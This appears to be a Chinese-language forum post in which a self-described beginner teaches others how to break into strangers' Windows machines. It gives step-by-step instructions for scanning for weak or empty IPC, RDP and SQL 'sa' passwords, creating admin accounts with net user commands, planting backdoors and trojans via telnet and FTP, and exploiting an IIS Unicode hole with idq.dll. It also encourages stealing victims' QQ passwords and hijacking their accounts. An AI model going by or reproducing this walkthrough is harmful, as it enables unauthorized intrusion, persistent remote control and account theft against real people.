看到论坛里有部分会员问的都是一些怎样入侵对方电脑的问题。想了许久，我决定自己提笔写一篇文章，总结我几个月来接触这个领域的一点经验，希望能对跟我一样菜的菜鸟们点帮助。这也是我第一次写文章，有些地方难免会出现错误，如有不明地方可以提出来。 
好～～！废话就不多说了，开始步入正题吧！！开始之前先请各位统装98的改装NT以上系统，因为下面用到的一些命令和软件 
在98下是行不通的。通常得到管理员权限才能说入侵控制了对方计算机，所以下面的入侵方法都能得到管理员权限。说句题外话，我用的是win2000，所以操作都是在这个系统通过的。 

1. 不用说，肯定是IPC弱口令啦，真不明白网上为什么会有那么多这种人见人爱车见车载的计算机，随便一扫都能扫出一大堆。首先，打开流光4.7，记得要打IP补丁啊，不然不能扫国内的主机，这样是很不爽的，要来个通杀嘛，呵呵。点击“探测-高级扫描工具”，出现一个方框，输入一段IP，检测项目中只需在IPC前面打钩。点“确定－开始”就开始探测了。如果你的IP段够好的话，很快就可以在最下面的方框里看到结果。哈哈～～真是多啊，基本上都是空口令。好，现在就开始入侵了，点击“工具－NT/IIS工具－种植者”，填入刚才扫描得到的结果，选一个应用程序文件，我常用的是独孤剑客的winshell(下面提到的都是默认设置），5K大小，是我56K猫的最爱～！你也可以上传灰鸽子，这种木马挺不错的，能自动解析域名上线，还可以避过防火墙。一分钟后，我传上去的winshell运行了，很自然的打开cmd.exe，打上nc IP 5277 提示输入密码，输入设置winshell时的密码(默认为空），回车就进入对方电脑了。这时出现cmd>提示符，输入i(安装winshell)再输入s(进入cmd)，再再输入“net start winshell”（后台服务，开机自动运行）。完成前面的步骤后，才算是真正进去了。进去干嘛呢？嗯～～这确实是个很高深的问题～～％￥想干什么就给你们去想吧。不过，呵呵，我还是想说几句，推荐找到他的tencent目录，找到他的QQ号码，加他为好友，方便以后长期控制他（肉机啊）。如果他不肯通过你的请求，那就用狠一点的手段，利用流光种植者再上传一个QQ杀手，把他的QQ密码偷到手。得到他的密码之后就～～～～～就用他的QQ登陆，再用自己的私人QQ提交好友请求。爽吧～～～～加多一句废话，如果他还没申请密码保护，那就好心点，帮他申请啦，不过邮箱记得要用自己的啊！！！ 

2. 3389。请各位注意，我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了，太难找了，如果有人找到了，那恭喜你啦，证明你今天时运高，记得要买彩票啊！众所周知，有开3389的一般都是服务器，也就是说有很大可能带局域网的，而内部入侵比外部要方便一点。如何能快速方便的得到开了终端的肉机呢？这需要用到两个工具，都是扫描工具来的，scanner3.0和焦点的xscan。打开scanner，输入一段IP，范围要大一点，scanner速度很快的。在“所有端口从”那里都填3389，点击“开始”就可以开工了。跟QQ上的好友聊了几句之后，铛～～～扫描完成，结果出来了。点击右下脚的“删除”把多余的IP删了，只留下开了3389的IP。再点击“保存”，把结果保存到文件夹里。找到保存文件的目录，打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑－替换”在“查找内容”里输入要删除的垃圾，再点“全部替换”就行了。打开xscan，点击左边的蓝色按钮，进入“扫描板块”，只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩，其他都清除掉。再点击右边的蓝色按钮，进入“扫描参数”，钩上“从文件获取主机列表”，打开刚才替换成纯IP的TXT文件，确定之后就可以扫描了。这时需要比较长的时间！去论坛灌灌水，跟MM说几句话吧，不要傻等就行了。确定目标，用mstsc（登陆终端的工具）登陆对方主机后，打开对方cmd.exe，输入“net use”，先看看有没有人也在连接这部机（安全一点好，^_^）。“net view”命令之后当出现一堆前面带\\字符的就表示～～就表示什么呢？？我想大家都非常明白吧! 这时你就可以在那部计算机里下载并装个像“网络执行官”之类的局域网控制软件。碰到这样的计算机一定要珍惜啊，要充分利用利用。 

3.sa空口令。这时又要用到流光了，点击“探测-扫描POP3/FTP/NT/SQL主机”，扫描主机类型设为SQL，把“将FrontPage主机自动加入HTTP列表”去掉。扫描结果出来了之后，用鼠标左键单击某一个结果，点两下“连接”就会出现一个方框，“Type Command at Prompt”提示符是SQLCMD>。打入一个命令“net user 要创建的用户名 密码 /add”（这是创建一个用户），再打一个“net localgroup administrators 刚创建的用户名 /add”（把创建的用户加到administrators组）。创建了用户当然是用流光种植者上传后门啦，填入资料，点确定，但却提示上传文件失败，再检查一下IP,用户名，密码，并没有错啊。咚咚～～～告诉你们吧，这是因为对方删除了IPC$，种植者需要IPC连接，你当然上传不了文件啦。这时候就要动用另一种工具，它的特点是：不依赖于目标的ipc$开放与否远程开启/关闭目标telnet服务，这就是“rtcs.vbs”。在cmd输入：“cscript RTCS.vbs 目标IP 用户名 密码 NTLM验证方式 telnet服务端口”，当出现“to get a shelll”时就表示成功了，你就可以“telnet IP 服务端口”了，简单吧！！如果你想上传木马，也很简单，只要登陆ftp服务器（要有你要下载的木马服务端）。这些可以找网上的肉机，弱密码的实在太多了，或用自己部机做服务器也可以，后面我会详细介绍。telnet上对方，输入“ftp ftp服务器IP”用户名密码进入，“get 木马服务端”就下载来了。“bye”退出ftp，输入木马文件名回车就运行了，以后你就可以用木马控制他了。 

4.U漏洞。这种漏洞现在虽然很少，但还是可以比较轻松的扫描到，用这种方法黑网站确实很轻松。但我们这次说的并不是如何黑网站，而是如何取得管理员权限。首先，启动流光，选择“探测--扫描POP3/FTP/NT/SQL主机”，“扫描主机类型”为NT/98。等一段时间（看你扫描IP多少来看）扫描完成后。如果你能在中间的方框里看到黑色的小电脑，就说明你已经得到了存在U漏洞的主机了。双击iiscrk（小金的作品），在“当前连接”处添上刚才扫描得到的主机，其他设置一般默认行了，不行，换其他方式试试。点击左边第一个图标连接IIS主机，如果成功，你就会在最下边的方框看到对方主机目录。要当心啊，具有删读的权限，不要乱破坏（警告）。好，现在开始真正工作了。单击左数第六个图标“tftp”，如何做我就不多说了，里面说得明明白白。不过，要上传什么文件我还是要说的，这个就是iiscrk自带的idq.dll，把它上传到cripts目录，成功后。在cmd输入“ispc 对方IP/scripts/idq.dll ”（ISPC每次执行一个命令要打3次回车）。成功登陆到对方后，你就有了system权限。用我上面提到的方法创建用户并加他到administrators组。我要补充的是，一般你连接上去时出现的目录都是可执行目录，文件可放在里面。 

本来我打算写多几种方法的，但没有什么时间，现在我连打开电脑的时间都受到了限制（痛苦ing)。因为这次期中考考得实在是＃￥＃！！唉～～～，有一科还是老师好心，送我几分我才及格（太惭愧了）。看来要以后啦。。 

上面提到的软件如果本站没有下载，www.google.com搜索。 

推荐几个不错的东东，适合菜鸟（我也经常用）： 
DameWare Mini Remote Control（远程桌面控制） 
Loader（我主要是用它来改QQ端口，因为我经常用代理啊） 
BlackICE PC Protection（防火墙） 
MsgSend（发信息用) 
QQ代理（不用我说，你们肯定知道是干嘛的） 
ttyip（隐藏自己在论坛、留言本、计数器、WEB聊天室、网页的真实IP)